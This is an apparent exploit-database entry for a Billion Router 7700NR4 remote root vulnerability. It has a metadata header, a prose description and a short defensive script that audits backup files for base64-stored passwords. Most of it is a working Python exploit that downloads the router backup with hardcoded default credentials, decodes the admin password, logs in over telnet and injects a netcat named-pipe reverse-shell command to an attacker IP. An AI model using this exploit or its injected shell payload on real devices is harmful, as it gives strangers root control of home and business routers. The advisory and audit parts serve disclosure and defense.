Vendor: Router 7700NR4
Author: R-73eN
CVSS: 9.8 (HIGH)
Title: Remote Root Command Execution
CWE: 287
Product Name: Router 7700NR4
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Billion Router 7700NR4
Year: 2016

Billion Router 7700NR4 Remote Root Command Execution

This router is widely used here in Albania; a telecom provider issues it to home and business users. The problem is that the router ships with hardcoded credentials which "can not be changed" by a normal user. Those credentials give us little access on their own, but because the backup download is not properly protected by authentication, we can use them to download the backup and recover the admin password. With that password we can log in to the telnet server and use a shell escape to get a reverse root connection.
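The weak point in the chain above is that the exported backup stores the admin password as base64, which is encoding rather than protection. The following audit script is an added example (not part of the advisory or the exploit) that scans a backup export for credential elements stored reversibly or set to the default "user" account named above; the sample backup and every element name other than AdminPassword are constructed assumptions.

```python
import base64
import binascii
import re

# Constructed sample of a backupsettings.conf export. Only <AdminPassword>
# is taken from the advisory; the other element names are assumptions.
SAMPLE_BACKUP = """<?xml version="1.0"?>
<BackupSettings>
  <AdminPassword>U3VwZXJTZWNyZXQxMjM=</AdminPassword>
  <UserPassword>dXNlcg==</UserPassword>
  <SerialNumber>PLACEHOLDER</SerialNumber>
</BackupSettings>
"""

# Elements whose name suggests they carry a credential.
CREDENTIAL_TAG = re.compile(
    r"<(\w*(?:Password|Passwd|Secret)\w*)>([^<]*)</\1>", re.I)

# Built-in account the advisory says a normal user cannot change.
KNOWN_DEFAULTS = {"user"}


def decode_if_base64(value):
    """Return the decoded text if value is base64 of printable ASCII, else None."""
    try:
        raw = base64.b64decode(value, validate=True)
    except (ValueError, binascii.Error):
        return None
    try:
        text = raw.decode("ascii")
    except UnicodeDecodeError:
        return None
    return text if text.isprintable() else None


def audit_backup(xml_text):
    """Return (tag, finding) pairs for credential elements stored reversibly."""
    findings = []
    for tag, value in CREDENTIAL_TAG.findall(xml_text):
        decoded = decode_if_base64(value.strip())
        if decoded is None:
            continue  # not reversible base64; nothing to report here
        if decoded in KNOWN_DEFAULTS:
            findings.append((tag, "decodes to a known vendor default"))
        else:
            findings.append((tag, "stored as base64 (reversible, not hashed)"))
    return findings
```

Run `audit_backup(SAMPLE_BACKUP)` against a real export to see which credentials anyone holding the backup can read back directly.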

Mitigation:

The only fix is to run this exploit against your own router, change the credentials, and disable all the other services using iptables.

Exploit-DB raw data:

# Title : Billion Router 7700NR4 Remote Root Command Execution
# Date : 06/10/2016
# Author : R-73eN
# Tested on: Billion Router 7700NR4 
# Vendor : http://www.billion.com/
# Vulnerability Description:
# This router is widely used here in Albania. It is given by a telecom provider to home and business users.
# The problem is that this router has hardcoded credentials which "can not be changed" by a normal user. Using these
# credentials we don't have too much access, but because of the lack of authentication security we can download the backup and get the admin password.
# Using that password we can log in to the telnet server and use a shell escape to get a reverse root connection.
# You must change host with the target and reverse_ip with your attacking ip.
# Fix:
# The only fix is hacking your router with this exploit, changing the credentials and disabling all the other services using iptables. 
#

import requests
import base64
import socket
import time

host = ""
def_user = "user"
def_pass = "user"
reverse_ip = ""
#Banner
banner = ""
banner +="  ___        __        ____                 _    _  \n"
banner +=" |_ _|_ __  / _| ___  / ___| ___ _ __      / \  | |    \n"
banner +="  | || '_ \| |_ / _ \| |  _ / _ \ '_ \    / _ \ | |    \n"
banner +="  | || | | |  _| (_) | |_| |  __/ | | |  / ___ \| |___ \n"
banner +=" |___|_| |_|_|  \___/ \____|\___|_| |_| /_/   \_\_____|\n\n"
print banner


# limited shell escape
evil = 'ping ;rm /tmp/backpipe;cd tmp;echo "mknod backpipe p && nc ' + reverse_ip  + ' 1337 0<backpipe | /bin/sh 1>backpipe &" > /tmp/rev.sh;chmod +x rev.sh;sh /tmp/rev.sh &'

def execute_payload(password):
	print "[+] Please run nc -lvp 1337 and then press any key [+]"
	raw_input()
	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	s.connect((host,23))
	s.recv(1024)
	s.send("admin\r")
	a= s.recv(1024)
	time.sleep(1)
	s.send(password +"\r")
	time.sleep(1)
	s.recv(1024)
	s.send(evil + "\r")
	time.sleep(1)
	print "[+] If everything worked you should get a reverse shell [+]"
	print "[+] Warning pressing any key will close the SHELL [+]"
	raw_input()




r = requests.get("http://" + host + "/backupsettings.conf" , auth=(def_user,def_pass))
if(r.status_code == 200):
	print "[+] Seems the exploit worked [+]"
	print "[+] Dumping data . . . [+]"
	temp = r.text
	admin_pass = temp.split("<AdminPassword>")[1].split("</AdminPassword>")[0]
#	print "[+] Admin password : " + str(base64.b64decode(admin_pass)) + " [+]"
	execute_payload(str(base64.b64decode(admin_pass)))
else:
	print "[-] Exploit Failed [-]"
print "\n[+] https://www.infogen.al/ [+]\n\n"